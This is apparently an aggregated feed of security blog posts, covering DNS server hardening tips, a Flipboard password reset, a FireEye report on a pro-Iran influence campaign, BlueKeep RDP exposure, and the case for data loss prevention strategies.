Hackers often tend to target DNS software, aiming to cause security breaches. Let’s discuss how to secure DNS servers using some very effective methods. Here we go…

Using a DNS forwarder helps

Using a DNS forwarder is of great help when it comes to securing DNS servers. A DNS forwarder is nothing but a DNS server that can be used to perform queries on behalf of another DNS server, thereby helping offload processing duties from the public DNS server. A DNS forwarder also helps prevent the public DNS server from interacting with Internet DNS servers, thereby protecting the resource records of the internal domain. So, it’s good to configure the internal DNS server to use a DNS forwarder for all the domains for which it’s not authoritative than letting your DNS server do the recursion and contacting DNS servers.

How to secure DNS servers with DNS resolvers and DNS advertisers

DNS resolvers and DNS advertisers help greatly when it comes to securing DNS servers. A DNS resolver is a DNS server that performs recursion to resolve names for domains for which the public DNS server is not authoritative while a DNS advertiser is a DNS server that resolves queries for domains for which the DNS server is not authoritative. The DNS resolver can be made available to your internal users or only to external users (thereby providing them a secure alternative- a DNS server outside your administrative control), or, if needed, to both internal and external users together. The DNS advertiser enhances security by preventing users from using your public DNS server to resolve names in other domains.

Caching-only DNS servers help increase security

Using a caching-only DNS server (which is not authoritative for any DNS domains) helps increase DNS security. Upon receiving a response, a caching-only DNS server caches the result and returns the answer to the system that issues the DNS query. Thus, the caching-only DNS server can, over time, amass a large cache of responses, thereby improving DNS response times for DNS clients of that server. Similarly, caching-only DNS servers can be used as forwarders too, thereby using them for performing recursion on behalf of the internal DNS servers. Thus, dependence on the ISP’s DNS servers can be avoided, thereby enhancing overall security.

Configure DNS servers to prevent cache pollution

Configuring DNS servers to prevent cache pollution is good. Thus, the DNS server cache wouldn’t be polluted with bogus entries and users would be protected from being forwarded to malicious websites. For Windows 2003, the DNS server is configured to prevent cache pollution by default. For Windows 2000 DNS server, it can be configured by opening the Properties dialog box for the DNS server, clicking the Advanced tab, then selecting the Prevent Cache Pollution checkbox and then finally restarting the DNS server.

Go for DDNS for secure connections only

DDNS is indeed of great help for DNS administrators, but DDNS updates, if allowed unchecked, could pose security risks as a hacker can configure a host to dynamically update DNS host records of a file server, web server or database server and get connections diverted. Hence, it’s always good to enable DDNS only for secure connections. Thus, it’s important to perform dynamic updates over secure connections only; this can be done by configuring the DNS server to use Active Directory-integrated zones and requiring secure dynamic updates.

Configure DNS servers to disable zone transfers

Disabling zone transfers helps greatly in enhancing DNS security. If zone transfers are enabled, it becomes possible for anyone to issue a DNS query that would cause a DNS server configured to allow zone transfers to dump all of its zone database files, the information from which can very easily be misused by a hacker. Such information can be used to spy on the naming schema in an organization and also to attack key infrastructure services. So, it’s good to configure the DNS servers to deny zone transfer requests or to allow them only to specific servers in a network.

Control DNS access using firewalls

Controlling DNS access using firewalls is important. Configure firewalls to block connections from external hosts to DNS servers that are used only for internal client queries. Similarly, there needs to be a firewall policy setting that blocks internal users from using the DNS protocol to connect to external DNS servers. Firewalls can also be configured to regulate queries from DNS servers that are used as caching-only forwarders.

Setting access controls on DNS file systems entries and registry entries

Setting access controls on DNS server-related file system entries and also on registry entries would help secure DNS servers. Such access controls ensure that only accounts that require access to these (file system entries or registry entries) can read or change them.

Also, Read:

Hacker Group Has Been Hacking DNS Traffic on D-Link Routers

How To Deal With DNS Vulnerabilities?

EDNS To Improve DNS Resolution Worldwide By February 2019

DHS Issues Security Order After DNS Hijack Attacks From Ira

Faster Internet with Privacy-Focused DNS Service

The post How to Secure DNS Servers and Prevent Security Issues appeared first on .

Flipboard Resets Users’ Passwords after Discovering Security Incident

News and social media aggregator Flipboard reset all users’ passwords after discovering a security incident that might have affected some of their data. On 28 May, the company revealed that its engineering team had recently detected suspicious activity in the network environment where its databases reside. Flipboard responded by launching an investigation and engaging an […]… Read More

The post Flipboard Resets Users’ Passwords after Discovering Security Incident appeared first on The State of Security.

Pro-Iran Campaign Spread Fake News During Mid-Terms

Pro-Iran Campaign Spread Fake News During Mid-Terms

Security researchers have uncovered a major new state-sponsored Iranian influence campaign using dozens of fake news sites and hundreds of spoofed social media accounts in an attempt to manipulate public opinion.

Most of the accounts in question were created between April 2018 and March 2019 and used to spread inauthentic content from sites such as Liberty Front Press (LFP), US Journal, and Real Progressive Front during the US mid-terms, according to FireEye.

Some included profile pics lifted from social media users with the same name, and some described themselves as activists, correspondents, or “free journalist” in their profile.

Others even impersonated US political candidates, such as Republicans Marla Livengood and Jineea Butler. In the latter cases, those behind the scenes plagiarize some of their legitimate tweets and then add in pro-Iranian content.

The content promoted by these accounts was overwhelmingly pro-Iranian, pro-Palestinian and anti-Saudi, anti-Israeli. However, a small percentage of messages were anti-Iran, possibly to add legitimacy to them and/or to draw in those with opposing views who can then be targeted with messages in support of the Islamic Republic.

Interestingly, the campaign appears to have extended to legitimate print and online media sources via guest columns, letters and blog posts republished on these platforms. In some cases, the text for separate articles penned by 'different' individuals was almost identical, or had the same narrative. Most appeared in small local US news outlets.

FireEye said the content was in line with “Iranian political interests in a manner similar to accounts that we have previously assessed to be of Iranian origin.” However, definitive attribution is difficult, especially as most of the accounts have now been suspended.

“Apart from the narratives and messaging promoted, we observed several limited indicators that the network was operated by Iranian actors. For example, one account in the network, @AlexRyanNY, created in 2010, had only two visible tweets prior to 2017, one of which, from 2011, was in Persian and of a personal nature,” FireEye continued.

“Subsequently in 2017, @AlexRyanNY claimed in a tweet to be ‘an Iranian who supported Hillary’ in a tweet directed at a Democratic political strategist. This account, using the display name ‘Alex Ryan’ and claiming to be a Newsday correspondent, appropriated the photograph of a genuine individual also with the first name of Alex.”

In addition, while most accounts in this network had their language set to English, one was set to Persian, the vendor revealed.

BlueKeep RDP flaw: Nearly a million Internet-facing systems are vulnerable

Two weeks have passed since Microsoft released security fixes and mitigation advice to defang expected exploits taking advantage of CVE-2019-0708 (aka BlueKeep), a wormable unauthenticated remote code execution flaw in Remote Desktop Services (RDP). The vulnerability, reported by UK’s National Cyber Security Centre (NCSC), has the potential to be the means for attacks that could rival the 2017 WannaCry onslaught and NotPetya attacks. A recent scanning effort by Robert Graham, head of offensive security research … More

The post BlueKeep RDP flaw: Nearly a million Internet-facing systems are vulnerable appeared first on Help Net Security.

4 Reasons Your Organization Needs a Data Loss Prevention Strategy

When deciding how to go about protecting your company’s sensitive data, there are plenty of different solutions to choose from, such as endpoint controls, file system controls, or even network traffic inspection. However, the technology is only as effective as the people and processes in charge of configuring, managing, and monitoring it.  That’s why it’s important that technology is not your only method of protecting your data, but instead a way to complement a strategy consisting of internal policies, procedures, and operations. This approach is called Data Loss Prevention (DLP), and should be implemented by every organization, regardless of size.

Why exactly should you consider a DLP strategy?  Here’s four of the main reasons:

1. You have sensitive information.

You have data; every company does. That data is important to your business, your customers, and you. We frequently hear about companies experiencing a data breach and only finding out months, or even years later, that there was a breach.  Take Marriott International, for example.  Marriott acquired a hotel chain called Starwood in 2016. What Starwood and Marriott didn’t know at the time was that Starwood had been breached in 2014. The attacker remained in the system after Marriott and Starwood merged their systems.

It wasn’t until 2018, four years later, that the breach was discovered. If Marriott had implemented an effective DLP strategy, they could have detected and purged the breach sooner through a number of different preventive or investigative procedures.

Your data is sensitive to your business’ success and should only be handled by people that you trust: you and your employees (on a least-privilege basis).

2.  Human error.

Employees can unintentionally leave sensitive data vulnerable. Whether that means they leave file systems vulnerable to unauthorized access, forget to flag an email as sensitive that contains Personally Identifiable Information (PII), or hand their coworker removable media with a list full of Social Security Numbers used for background checks, it should go without saying that humans can make mistakes.

That’s where a thorough DLP strategy can help; if a DLP solution is configured and monitoring your environment according to your policies, you can set enforced rules that prevent these mistakes and generate accurate reports and alerts.  Combine this with employee security training, and you have a chance to fix the potential damage to your business before it happens.

If you lack the resources to set up those configurations, reports, and alerts, you can hire a Managed Security Service Provider (MSSP) to take care of those for you.

3. Malicious Insider threats.

Consider the following scenario:

You hire an individual and they have been performing expertly. They seem to enjoy the job and they haven’t requested a raise in years. Little did you know that when you hired them, they immediately started stealing and selling your data to the highest bidder. This is an extreme scenario, but it does happen. There are organizations and nation-states that will pay top dollar for your sensitive data, and they will gladly target your employees to do it.

Implementing a DLP strategy that includes thorough scenario training can discourage your employees from being persuaded into selling your data, as well as help catch those who do it. With properly trained employees and an effective chain of command, insiders can be reported by their peers at every possible point and be stopped before serious damage is done to your business’ reputation and resulting profits.

4. This is the 21st century of interconnectivity.

We’re connected to everything these days; it’s human nature to crave popularity, which has caused an obsession over online presence that doesn’t always take into account protecting sensitive data. When there’s so many easy ways to send, receive, and view different types of communications from so many devices, it’s easy to blur the line of what belongs on which devices.

We’ve already pointed out that humans make mistakes; why not use a well thought-out DLP strategy and implemented technology to keep an eye on your critical data and tell you when your employees do make those mistakes?  Whether you implement your own monitoring team or contract with an MSSP, a DLP solution will solidify those previously blurred lines of where that data does and doesn’t belong.

In summary, you need a DLP strategy because you have sensitive data, you employ humans who can or might want to sell your data, and even the best policies and procedures can’t stop someone from unknowingly exposing your company’s data. A Data Loss Prevention Strategy written with supporting technologies in mind can mitigate those risks.

Learn more about how Managed Security Services can help keep your data secure.

The post 4 Reasons Your Organization Needs a Data Loss Prevention Strategy appeared first on GRA Quantum.